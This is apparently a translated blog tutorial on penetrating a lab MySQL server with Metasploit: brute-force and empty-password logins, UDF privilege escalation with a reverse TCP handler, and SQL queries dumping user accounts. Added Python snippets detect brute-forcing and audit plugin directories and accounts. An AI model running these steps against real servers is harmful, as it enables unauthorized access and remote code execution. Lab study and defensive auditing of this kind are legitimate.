Stop Running MySQL Like This: It Can Be Cracked in Minutes

2022-08-28 12:17:15

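Metasploit Framework (MSF) is an open-source security vulnerability detection tool that ships with thousands of known software vulnerabilities and is continuously updated. Metasploit can be used across the whole penetration-testing workflow, including information gathering, vulnerability detection and exploitation, and the security community has dubbed it the tool that "can hack the entire universe". Metasploit was originally written in Perl, but later versions were rewritten in Ruby. Kali ships with Metasploit preinstalled.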

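Here, ops engineer Zhu demonstrates the whole process of quickly penetrating a MySQL service, and also points out how to protect against it.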

Logging in to msf

# Log in to msf
┌──(root㉿kali)-[~]
└─# msfconsole

Using the mysql_login module

This module can be used for brute-force password guessing or for empty-password detection.

# Search for the MySQL login module
msf6 > search mysql_login
Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login

# Select the module, either by module name or by its index
msf6 > use 0
or
msf6 > use auxiliary/scanner/mysql/mysql_login

# Show the options. Required = yes means a value must be supplied; some options have a default value (Current Setting)
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted:
                                                none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framewo
                                                rk/wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per
                                                 line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

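Empty-password detection with mysql_login

Empty-password detection only works if MySQL has granted access to the current host. A common dangerous practice is to use % as the host when granting privileges, which means every host is allowed to connect.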

# Empty-password detection:
## Only the remote host needs to be set; USERNAME defaults to root and BLANK_PASSWORDS defaults to true
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Found remote MySQL version 5.5.68
[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Success: 'root:'
[*] 192.168.75.121:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Password brute-forcing with mysql_login

# Prepare the password file
cat > /tmp/passwd.txt <<EOF
123456
root123456
EOF

# Set the remote host
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.75.121
rhosts => 192.168.75.121

# Set the password file to try for the root login
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file /tmp/passwd.txt
pass_file => /tmp/passwd.txt

# Attack; the output shows that the password root123456 is correct.
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Found remote MySQL version 5.5.68
[-] 192.168.75.121:3306     - 192.168.75.121:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'192.168.75.123' (using password: NO))
[-] 192.168.75.121:3306     - 192.168.75.121:3306 - LOGIN FAILED: root:123456 (Incorrect: Access denied for user 'root'@'192.168.75.123' (using password: YES))
[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Success: 'root:root123456'
[*] 192.168.75.121:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
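
Each failed guess above produces an "Access denied" error on the server, which is what a defender can alert on. The following Python detector is an added example, not part of the original article; it assumes the server writes access-denied warnings to its error log in the MariaDB 5.5 style, and the sample lines, threshold and window are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (assumed MariaDB 5.5 error-log layout), not from the page.
SAMPLE_LOG = """\
220812 14:40:01 [Warning] Access denied for user 'root'@'192.168.75.123' (using password: NO)
220812 14:40:01 [Warning] Access denied for user 'root'@'192.168.75.123' (using password: YES)
220812 14:40:02 [Warning] Access denied for user 'root'@'192.168.75.123' (using password: YES)
220812 14:40:02 [Warning] Access denied for user 'test'@'192.168.75.123' (using password: YES)
220812 14:40:03 [Warning] Access denied for user 'root'@'192.168.75.123' (using password: YES)
220812 14:55:10 [Warning] Access denied for user 'app'@'192.168.75.50' (using password: YES)
220812 15:20:44 [Warning] Access denied for user 'app'@'192.168.75.50' (using password: YES)
"""

DENIED = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<src>[^']*)' \(using password: (?P<pw>YES|NO)\)"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag every source with >= threshold denied logins inside one sliding window."""
    recent = defaultdict(deque)      # source -> timestamps still inside the window
    users = defaultdict(set)         # source -> every account name it tried
    blank = defaultdict(bool)        # source -> tried at least one empty password
    alerts = {}
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if not m:
            continue                 # unrelated log line
        ts = datetime.strptime(m["ts"], "%y%m%d %H:%M:%S")
        src = m["src"]
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:    # expire attempts older than the window
            q.popleft()
        users[src].add(m["user"])
        blank[src] = blank[src] or m["pw"] == "NO"
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(src, {}).get("failures", 0))
            alerts[src] = {"failures": peak, "users": sorted(users[src]),
                           "blank_probe": blank[src]}
    return alerts

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```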

Empty-password detection with nmap

msf6 > nmap -p3306 --script=mysql-empty-password.nse 192.168.75.121

# db_nmap stores the scan results in the database; the database connection must be configured beforehand
msf6 > db_nmap -p3306 --script=mysql-empty-password.nse 192.168.75.121
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-12 14:44 CST
[*] Nmap: Nmap scan report for 192.168.75.121
[*] Nmap: Host is up (0.00089s latency).
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 3306/tcp open  mysql
[*] Nmap: | mysql-empty-password:
[*] Nmap: |_  root account has empty password
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

UDF privilege escalation

Uploading the lib module with mysql_udf_payload

msf6 > search udf
msf6 > use 3
msf6 exploit(multi/mysql/mysql_udf_payload) > show options
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 192.168.75.121
msf6 exploit(multi/mysql/mysql_udf_payload) > set password root123456
msf6 exploit(multi/mysql/mysql_udf_payload) > run
[*] Started reverse TCP handler on 192.168.75.143:4444 
[*] 192.168.75.121:3306 - Checking target architecture...
[*] 192.168.75.121:3306 - Checking for sys_exec()...
[*] 192.168.75.121:3306 - Checking target architecture...
[*] 192.168.75.121:3306 - Checking for MySQL plugin directory...
[*] 192.168.75.121:3306 - Target arch (linux64) and target path both okay.
[*] 192.168.75.121:3306 - Uploading lib_mysqludf_sys_64.so library to /usr/lib64/mysql/plugin/nixZkpEs.so...
[*] 192.168.75.121:3306 - Checking for sys_exec()...
[*] 192.168.75.121:3306 - Command Stager progress -  55.47% done (1444/2603 bytes)
[*] 192.168.75.121:3306 - Command Stager progress - 100.00% done (2603/2603 bytes)
[*] Exploit completed, but no session was created.

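If run reports an error saying that the xxx.so file cannot be created, the required permission is missing. SELinux being set on the remote server, or the /usr/lib64/mysql/plugin/ directory not being writable, will both cause this problem.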
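
The write permission mentioned above can be verified from the defender's side. This Python check is an added example, not part of the original article: it evaluates whether a given account can create files in the plugin directory and lists libraries missing from a baseline. The uid/gid arguments, the baseline set and the temporary directory standing in for /usr/lib64/mysql/plugin/ are assumptions.

```python
import os
import stat
import tempfile

def can_write(st, uid, gids):
    """POSIX mode-bit check: may a process with this uid/gids create files in
    the directory? Needs write + search permission. ACLs and SELinux policy
    are not evaluated here."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        bits = stat.S_IWUSR | stat.S_IXUSR
    elif st.st_gid in gids:
        bits = stat.S_IWGRP | stat.S_IXGRP
    else:
        bits = stat.S_IWOTH | stat.S_IXOTH
    return st.st_mode & bits == bits

def audit_plugin_dir(path, mysqld_uid, mysqld_gids, baseline):
    """Report a plugin directory the mysqld account can write to, and any
    shared library in it that is absent from the expected baseline."""
    findings = []
    if can_write(os.stat(path), mysqld_uid, mysqld_gids):
        findings.append("plugin directory is writable by the mysqld account")
    for name in sorted(os.listdir(path)):
        if name.endswith(".so") and name not in baseline:
            findings.append(f"library not in baseline: {name}")
    return findings

def demo():
    """Constructed stand-in for the plugin directory: one baseline library,
    one randomly named .so, and a world-writable directory mode."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("ha_example.so", "nixZkpEs.so", "README"):
            open(os.path.join(d, name), "w").close()
        os.chmod(d, 0o777)
        other_uid = os.stat(d).st_uid + 1   # a non-root account that does not own d
        return audit_plugin_dir(d, other_uid, set(), baseline={"ha_example.so"})

if __name__ == "__main__":
    print(demo())
```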

Executing attack SQL statements with mysql_sql

Once the module has been uploaded, the relevant SQL statements can be executed.

# Search for the mysql_sql module
msf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_sql
# Select the first one
msf6 exploit(multi/mysql/mysql_udf_payload) > use 0
# Set the remote host
msf6 auxiliary(admin/mysql/mysql_sql) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
# Set the password (obtained from the earlier cracking step)
msf6 auxiliary(admin/mysql/mysql_sql) > set password root123456
password => root123456
# Set the user
msf6 auxiliary(admin/mysql/mysql_sql) > set username root
username => root
# By default the module runs a SQL statement that shows the database version
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 192.168.75.121

[*] 192.168.75.121:3306 - Sending statement: 'select version()'...
[*] 192.168.75.121:3306 -  | 5.5.68-MariaDB |
[*] Auxiliary module execution completed

# Run a custom SQL statement
msf6 auxiliary(admin/mysql/mysql_sql) > set sql "select user,host from mysql.user"
sql => select user,host from mysql.user
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 192.168.75.121
[*] 192.168.75.121:3306 - Sending statement: 'select user,host from mysql.user'...
[*] 192.168.75.121:3306 -  | root | % |
[*] 192.168.75.121:3306 -  | test | % |
[*] 192.168.75.121:3306 -  | root | 127.0.0.1 |
[*] 192.168.75.121:3306 -  |  | 192-168-75-121 |
[*] 192.168.75.121:3306 -  | root | 192-168-75-121 |
[*] 192.168.75.121:3306 -  | root | ::1 |
[*] 192.168.75.121:3306 -  |  | localhost |
[*] 192.168.75.121:3306 -  | root | localhost |
[*] Auxiliary module execution completed
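
The account listing above contains wildcard hosts (%) and anonymous users, the same precondition the empty-password section describes. The following Python triage is an added example, not part of the original article; the `password` column (MariaDB 5.5 layout), the placeholder hash and the severity rules are assumptions, and the rows are constructed to mirror the listing.

```python
H = "*" + "0" * 40   # constructed placeholder for a non-empty password hash

# Constructed rows shaped like `select user,host,password from mysql.user`.
ROWS = [
    ("root", "%", H),
    ("test", "%", ""),
    ("root", "127.0.0.1", H),
    ("", "192-168-75-121", ""),
    ("root", "192-168-75-121", H),
    ("root", "::1", H),
    ("", "localhost", ""),
    ("root", "localhost", H),
]

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def audit_accounts(rows):
    """Return (severity, account, reasons) tuples, worst first."""
    findings = []
    for user, host, pw_hash in rows:
        reasons = []
        remote = host not in LOCAL_HOSTS
        if "%" in host or "_" in host:   # MySQL host patterns use % and _ as wildcards
            reasons.append("wildcard host")
        if not pw_hash:
            reasons.append("empty password")
        if not user:
            reasons.append("anonymous user")
        if not reasons:
            continue
        if remote and not pw_hash:
            severity = "critical"        # reachable over the network with no password
        elif user == "root" and remote:
            severity = "high"            # admin account exposed to password guessing
        else:
            severity = "medium"
        findings.append((severity, f"'{user}'@'{host}'", reasons))
    order = {"critical": 0, "high": 1, "medium": 2}
    return sorted(findings, key=lambda f: order[f[0]])

if __name__ == "__main__":
    for finding in audit_accounts(ROWS):
        print(finding)
```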
